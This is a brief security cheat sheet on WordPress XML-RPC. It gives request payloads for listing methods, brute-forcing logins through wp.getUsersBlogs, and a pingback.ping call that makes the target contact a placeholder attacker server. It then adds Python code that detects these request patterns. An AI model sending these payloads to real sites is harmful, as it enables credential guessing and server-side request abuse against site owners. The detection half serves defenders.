
XML-RPC

POST to /xmlrpc.php

List Methods

<methodCall>
<methodName>system.listMethods</methodName>
<params></params>
</methodCall>

Brute force credentials

  • wp.getUsersBlogs
  • wp.getCategories
  • metaWeblog.getUsersBlogs

<methodCall>
<methodName>wp.getUsersBlogs</methodName>
<params>
<param><value>admin</value></param>
<param><value>pass</value></param>
</params>
</methodCall>

PingBack

<methodCall>
<methodName>pingback.ping</methodName>
<params>
<param><value><string>http://<YOUR SERVER >:<port></string></value></param>
<param><value><string>http://<SOME VALID BLOG FROM THE SITE ></string></value></param>
</params>
</methodCall>
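
Detection

A defender-side view of the three request types above, as an added example that is not part of the original page: it classifies XML-RPC request bodies posted to /xmlrpc.php by methodName and flags clients that enumerate methods, send pingbacks, or repeat credential-bearing calls. The function names, the threshold of 5 and the sample traffic are assumptions constructed for illustration.

```python
import xml.etree.ElementTree as ET
from collections import Counter

# Methods the page lists under "Brute force credentials".
AUTH_METHODS = {"wp.getUsersBlogs", "wp.getCategories", "metaWeblog.getUsersBlogs"}

def classify(body):
    """Map one XML-RPC request body to enumeration/auth/pingback/other/malformed."""
    # Refuse DTDs outright: a methodCall never needs one, and it avoids entity tricks.
    if "<!DOCTYPE" in body or "<!ENTITY" in body:
        return "malformed"
    try:
        root = ET.fromstring(body)
    except ET.ParseError:
        return "malformed"
    name = (root.findtext("methodName") or "").strip()
    if root.tag != "methodCall" or not name:
        return "malformed"
    if name == "system.listMethods":
        return "enumeration"
    if name in AUTH_METHODS:
        return "auth"
    if name == "pingback.ping":
        return "pingback"
    return "other"

def flag_clients(requests, auth_threshold=5):
    """requests: iterable of (client_ip, body). Returns {ip: sorted list of reasons}."""
    auth_calls, findings = Counter(), {}
    for ip, body in requests:
        kind = classify(body)
        if kind == "auth":
            auth_calls[ip] += 1
        elif kind in ("enumeration", "pingback"):
            findings.setdefault(ip, set()).add(kind)
    for ip, count in auth_calls.items():
        if count >= auth_threshold:  # assumed threshold, tune per site
            findings.setdefault(ip, set()).add("auth-burst")
    return {ip: sorted(reasons) for ip, reasons in findings.items()}

def _call(method, *args):
    """Build a constructed sample body in the shape the page shows."""
    params = "".join(f"<param><value>{a}</value></param>" for a in args)
    return f"<methodCall><methodName>{method}</methodName><params>{params}</params></methodCall>"

# Constructed sample traffic (documentation IP ranges, placeholder credentials).
SAMPLE = [("192.0.2.10", _call("system.listMethods"))]
SAMPLE += [("192.0.2.10", _call("wp.getUsersBlogs", "admin", f"guess{i}")) for i in range(6)]
SAMPLE += [("198.51.100.7", _call("wp.getUsersBlogs", "editor", "placeholder"))]
SAMPLE += [("203.0.113.5", _call("pingback.ping", "http://example.invalid/", "http://blog.example/post"))]
```

Calling flag_clients(SAMPLE) reports the first client for enumeration plus an auth burst and the third for a pingback, while the single login-style call from 198.51.100.7 stays below the threshold.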